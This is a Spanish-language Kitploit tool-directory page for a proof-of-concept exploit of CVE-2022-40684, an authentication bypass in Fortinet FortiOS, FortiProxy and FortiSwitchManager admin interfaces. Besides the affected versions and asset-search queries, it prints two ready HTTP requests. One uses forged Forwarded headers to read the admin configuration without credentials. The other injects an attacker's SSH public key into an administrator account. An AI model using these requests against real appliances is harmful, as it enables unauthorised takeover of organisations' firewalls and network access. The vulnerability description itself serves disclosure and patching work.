Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-40684 — PoC y exploit para CVE-2022-40684, un bypass de autenticación en las interfaces de administración de Fortinet FortiOS, FortiProxy y FortiSwitchManager, permitiendo acceso de administrador no autorizado mediante solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/hughink/cve-2022-40684
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubhughink/cve-2022-40684

CVE-2022-40684

PoC y exploit para CVE-2022-40684, un bypass de autenticación en las interfaces de administración de Fortinet FortiOS, FortiProxy y FortiSwitchManager, permitiendo acceso de administrador no autorizado mediante solicitudes HTTP manipuladas.

Ver Repositorio
11324hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-40684

Cumplimiento de la ley y la disciplina:

Cualquier persona u organización que utilice la red debe cumplir con la Constitución y las leyes, observar el orden público y respetar la moral social. No se debe poner en peligro la seguridad de la red, ni utilizar la red para realizar actividades que atenten contra la seguridad, el honor o los intereses nacionales.

Descripción de la vulnerabilidad:

Fortinet es un proveedor de renombre mundial de productos de seguridad de red y soluciones de seguridad. Sus productos incluyen cortafuegos, software antivirus, sistemas de prevención de intrusiones y componentes de seguridad de terminales. En la interfaz de administración de los productos FortiOS, FortiProxy y FortiSwitchManager afectados, es posible omitir la autenticación utilizando una ruta o canal alternativo, y operar la interfaz de administración a través de solicitudes HTTP o HTTPS especialmente diseñadas sin autenticación.

Nivel de riesgo:

Alto

Versiones afectadas:

FortiOS versión 7.2.0 - 7.2.1

FortiOS versión 7.0.0 - 7.0.6

FortiProxy versión 7.2.0

FortiProxy versión 7.0.0 - 7.0.6

FortiSwitchManager versión 7.2.0

FortiSwitchManager versión 7.0.0

Identificación de activos:

title="FortiProxy"

title="FortiGate"

Replicación de la vulnerabilidad:

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

Descargar herramienta